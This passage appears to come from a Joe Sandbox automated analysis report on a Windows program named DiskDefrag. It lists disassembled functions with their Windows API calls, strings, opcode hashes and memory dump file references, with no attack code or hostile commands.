                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000551000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.000000000055A000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000565000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000599000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: MessageSend$InvalidateRect
                                                                                                                                                                                                                                                                                    • String ID: Button_Check$`=
                                                                                                                                                                                                                                                                                    • API String ID: 2778011698-3236272720
                                                                                                                                                                                                                                                                                    • Opcode ID: 45b91e48737b704d3f690cfb1dc7e8588fa66482c43df7c3c5e128cf77c7356e
                                                                                                                                                                                                                                                                                    • Instruction ID: 0eaeb928ae6b5a569979d6d52056a3389dc0ef6ae13505e9256ef6b005c906b2
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 45b91e48737b704d3f690cfb1dc7e8588fa66482c43df7c3c5e128cf77c7356e
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 55510432304611DFC724EF68D8C4E9BB7A4EF88320F514A2AE95597391D774FC418BAA
                                                                                                                                                                                                                                                                                    Function 00431060 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 150windowCOMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,0000014E,?,00000000), ref: 004311B1
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 004311C3
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349381511.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349961617.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350013723.0000000000496000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000551000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.000000000055A000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000565000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000599000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: MessageSend
                                                                                                                                                                                                                                                                                    • String ID: 8F$ColorIndex$DiskDefrag\Setting Option\Gereral\DefragColor
                                                                                                                                                                                                                                                                                    • API String ID: 3850602802-4007200279
                                                                                                                                                                                                                                                                                    • Opcode ID: 502c51c2ec178f428166c2452066da618523e55121de244a43143375eb21c717
                                                                                                                                                                                                                                                                                    • Instruction ID: 3c3eec78f5ba70d7f73749eb8d42c303dcc8a252b1b76d151490117dce650f0e
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 502c51c2ec178f428166c2452066da618523e55121de244a43143375eb21c717
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F34119717802055BEB10AF75CD82FBA3284DB59764F000A3EFA06EF2D2DA6CDC48466D
                                                                                                                                                                                                                                                                                    Function 00432BF0 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 144windowCOMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,0000100C,000000FF,00000002), ref: 00432C6E
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,0000100C,-00000002,00000002), ref: 00432CB4
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349381511.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349961617.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350013723.0000000000496000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000551000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.000000000055A000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000565000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000599000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: MessageSend
                                                                                                                                                                                                                                                                                    • String ID: 3402077$3402078$tFH
                                                                                                                                                                                                                                                                                    • API String ID: 3850602802-2744557037
                                                                                                                                                                                                                                                                                    • Opcode ID: 3a14f707ade8a06f74c98b1bb9dd0f0bab00e6a46749f54205f261b932b07e13
                                                                                                                                                                                                                                                                                    • Instruction ID: 0052325b0c9a5ab111783a0a252863c2f47d3c18ee4d5c8230f443e5887af2fe
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3a14f707ade8a06f74c98b1bb9dd0f0bab00e6a46749f54205f261b932b07e13
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 415160712083819FD325EF20DE99FDBB7E4AF99704F00491EF18E92191CBB46948CB5A
                                                                                                                                                                                                                                                                                    Function 00424660 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 130timeCOMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • InvalidateRect.USER32(?,00000000,00000001), ref: 00424680
                                                                                                                                                                                                                                                                                    • RedrawWindow.USER32(?,00000000,00000000,00000105), ref: 0042471F
                                                                                                                                                                                                                                                                                    • SetTimer.USER32(?,00000002,000003E8,00000000), ref: 0042474F
                                                                                                                                                                                                                                                                                    • KillTimer.USER32(?,00000002), ref: 00424770
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349381511.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349961617.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350013723.0000000000496000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000551000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.000000000055A000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000565000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000599000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Timer$InvalidateKillRectRedrawWindow
                                                                                                                                                                                                                                                                                    • String ID: `=
                                                                                                                                                                                                                                                                                    • API String ID: 4168450595-2762138152
                                                                                                                                                                                                                                                                                    • Opcode ID: 8d72688a5271403dce2d565fb5cb8f01ebbe79f233b85fa5517f2f7365920491
                                                                                                                                                                                                                                                                                    • Instruction ID: 7d708aa27c06dc00fcb9f864fdcaa6ded2618e4328842cf70fbd9c9851442ce7
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8d72688a5271403dce2d565fb5cb8f01ebbe79f233b85fa5517f2f7365920491
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3941A23170021ADFC730EF65EC88B9AB3A5FF85315F50452EE85997290CB78A984CF69
                                                                                                                                                                                                                                                                                    Function 0041DC20 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 125COMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • SHBrowseForFolderW.SHELL32 ref: 0041DC8E
                                                                                                                                                                                                                                                                                    • SHGetPathFromIDListW.SHELL32(00000000,00000000), ref: 0041DCBD
                                                                                                                                                                                                                                                                                    • GetLongPathNameW.KERNEL32(0047D9D0,00000000), ref: 0041DD06
                                                                                                                                                                                                                                                                                    • GetLongPathNameW.KERNEL32(BB40E64E,00000000), ref: 0041DD33
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349381511.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349961617.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350013723.0000000000496000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000551000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.000000000055A000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000565000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000599000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Path$LongName$BrowseFolderFromList
                                                                                                                                                                                                                                                                                    • String ID: 3402075
                                                                                                                                                                                                                                                                                    • API String ID: 4132326259-2194680865
                                                                                                                                                                                                                                                                                    • Opcode ID: bd1580488c3d15575b1391a656ffdd20babe2d7e46e482bada2f60351b01d740
                                                                                                                                                                                                                                                                                    • Instruction ID: a9706069ea416aad4f302c8e8149c97dc391afa5e31a47db3cf999b1b5352ce6
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: bd1580488c3d15575b1391a656ffdd20babe2d7e46e482bada2f60351b01d740
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: AD4152715083419FC314EF64DD88AABBBF4FB89710F400A3EF65A922A0DB759944CB5A
                                                                                                                                                                                                                                                                                    Function 0041A820 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 121COMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • SHGetSpecialFolderPathW.SHELL32(00000000,00000000,?,?,?,00000000,00476569,000000FF,0041A806), ref: 0041A883
                                                                                                                                                                                                                                                                                    • PathFileExistsW.SHLWAPI(?,?,?,?,?,00000000,00476569,000000FF,0041A806), ref: 0041A8F4
                                                                                                                                                                                                                                                                                    • #165.SHELL32(00000000,?,?,?,?,?,00000000,00476569,000000FF,0041A806), ref: 0041A904
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349381511.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349961617.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350013723.0000000000496000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000551000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.000000000055A000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000565000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000599000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Path$#165ExistsFileFolderSpecial
                                                                                                                                                                                                                                                                                    • String ID: DiskDefrag$\DiskDefrag
                                                                                                                                                                                                                                                                                    • API String ID: 3813007343-1352560241
                                                                                                                                                                                                                                                                                    • Opcode ID: f1b0aa55b9a1a9fc4a94be1b2fda63a650aa8c59690cdb364ca348087f413052
                                                                                                                                                                                                                                                                                    • Instruction ID: 938fb3785b8e758ab9aa55aacaf13088161b2d62692eeac53cc892e3a5652775
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f1b0aa55b9a1a9fc4a94be1b2fda63a650aa8c59690cdb364ca348087f413052
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CE4195B16083019BD300EF65DD85AABB7E4FF98714F00453EF54AD2290EB349949CBAB
                                                                                                                                                                                                                                                                                    Function 00465E00 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 121COMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349381511.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349961617.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350013723.0000000000496000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000551000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.000000000055A000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000565000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000599000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: ObjectSelect
                                                                                                                                                                                                                                                                                    • String ID: `=
                                                                                                                                                                                                                                                                                    • API String ID: 1517587568-2762138152
                                                                                                                                                                                                                                                                                    • Opcode ID: 116e8130f725741a0df8cffd76ef37318a9139d2394634156b2cf1340f76da15
                                                                                                                                                                                                                                                                                    • Instruction ID: 398bc34aaeb48a28786a3eeef8d096b9ba9882d646282afc346b5bddce66a1f9
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 116e8130f725741a0df8cffd76ef37318a9139d2394634156b2cf1340f76da15
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 36417E32200A048FD724EFA9E884E6BF3A5EF94321B05852FE84A97611DB35F840CB55
                                                                                                                                                                                                                                                                                    Function 00402A30 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 119windowCOMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                      • Part of subcall function 0041DB30: GetLogicalDrives.KERNEL32 ref: 0041DB47
                                                                                                                                                                                                                                                                                      • Part of subcall function 0041DB30: GetDriveTypeW.KERNEL32(?,?,?,00094658), ref: 0041DB8A
                                                                                                                                                                                                                                                                                    • SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00000200), ref: 00402ADD
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00402AF7
                                                                                                                                                                                                                                                                                      • Part of subcall function 0041AA20: SHGetFileInfoW.SHELL32(?,00000000,000002B4,000002B4,00004001), ref: 0041AA4D
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001214,00000004,00000000), ref: 00402B9F
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349381511.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349961617.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350013723.0000000000496000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000551000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.000000000055A000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000565000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000599000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: FileInfoMessageSend$DriveDrivesLogicalType
                                                                                                                                                                                                                                                                                    • String ID: 8F$C:\
                                                                                                                                                                                                                                                                                    • API String ID: 2359154852-3356063517
                                                                                                                                                                                                                                                                                    • Opcode ID: 3170ff8149e9c2b6ee3bcf2834819091aa34d1669217c11efa96fe0deec9a490
                                                                                                                                                                                                                                                                                    • Instruction ID: 82d795afe4258906e57f36ef34ec2eb48dfa52df3f098ca2abc9abbdf1da0df4
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3170ff8149e9c2b6ee3bcf2834819091aa34d1669217c11efa96fe0deec9a490
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D541D6717443406BE324DF61DC86FAA73A4AB84B04F00492DF249AB2C1DBB4A545CB9A
                                                                                                                                                                                                                                                                                    Function 00410A20 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 111windowCOMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                      • Part of subcall function 00426DC0: EnterCriticalSection.KERNEL32(?,BB40E64E,?,?), ref: 00426E01
                                                                                                                                                                                                                                                                                    • GetParent.USER32(?), ref: 00410AB3
                                                                                                                                                                                                                                                                                    • GetParent.USER32(?), ref: 00410AC5
                                                                                                                                                                                                                                                                                    • RedrawWindow.USER32(?,00000000,00000000,00000105,00000000), ref: 00410AFA
                                                                                                                                                                                                                                                                                      • Part of subcall function 00414FD0: GetParent.USER32(?), ref: 00414FD4
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,0000108E,00000000,00000000), ref: 00410AE5
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349381511.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349961617.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350013723.0000000000496000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000551000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.000000000055A000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000565000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000599000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Parent$CriticalEnterMessageRedrawSectionSendWindow
                                                                                                                                                                                                                                                                                    • String ID: 8F
                                                                                                                                                                                                                                                                                    • API String ID: 1290606431-180763933
                                                                                                                                                                                                                                                                                    • Opcode ID: 143fed41e4f3855d081119d730e229c73714f0bc93d99b8b5aa2bb9d49ef1950
                                                                                                                                                                                                                                                                                    • Instruction ID: 5206ba9288f2f952280e77a0a87cb2f91fe58ff6aeb235107940afbc2e9b071e
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 143fed41e4f3855d081119d730e229c73714f0bc93d99b8b5aa2bb9d49ef1950
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5631B1723087049BD320DF64DC81F9BB3A4FB98720F10461EE9498B780DB79E841CB9A
                                                                                                                                                                                                                                                                                    Function 0040F130 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 89windowCOMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetDC.USER32(?), ref: 0040F162
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 0040F17A
                                                                                                                                                                                                                                                                                    • GetClientRect.USER32(?,?), ref: 0040F19B
                                                                                                                                                                                                                                                                                    • ReleaseDC.USER32(?,?), ref: 0040F210
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349381511.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349961617.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350013723.0000000000496000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000551000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.000000000055A000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000565000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000599000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: ClientMessageRectReleaseSend
                                                                                                                                                                                                                                                                                    • String ID: 8F
                                                                                                                                                                                                                                                                                    • API String ID: 1863454828-180763933
                                                                                                                                                                                                                                                                                    • Opcode ID: d11ef34d3e0fffcceb367614637f6adb86afbda3cb939e7e07ff16f8205efc76
                                                                                                                                                                                                                                                                                    • Instruction ID: d6bf508d08b3a67db9d2b0dabc6a54fdde4e7c081a099a00f88e8aa49dac70a3
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d11ef34d3e0fffcceb367614637f6adb86afbda3cb939e7e07ff16f8205efc76
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7C3128B5204341AFC314DF68C984E5AB7E9FB88610F104A1EF559C3290EB34A905CB55
                                                                                                                                                                                                                                                                                    Function 0041AA90 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 68windowCOMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetDC.USER32(?), ref: 0041AADC
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 0041AAF4
                                                                                                                                                                                                                                                                                    • GetTextExtentPoint32W.GDI32(?,?,?,?), ref: 0041AB1C
                                                                                                                                                                                                                                                                                    • ReleaseDC.USER32(?,?), ref: 0041AB37
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349381511.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349961617.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
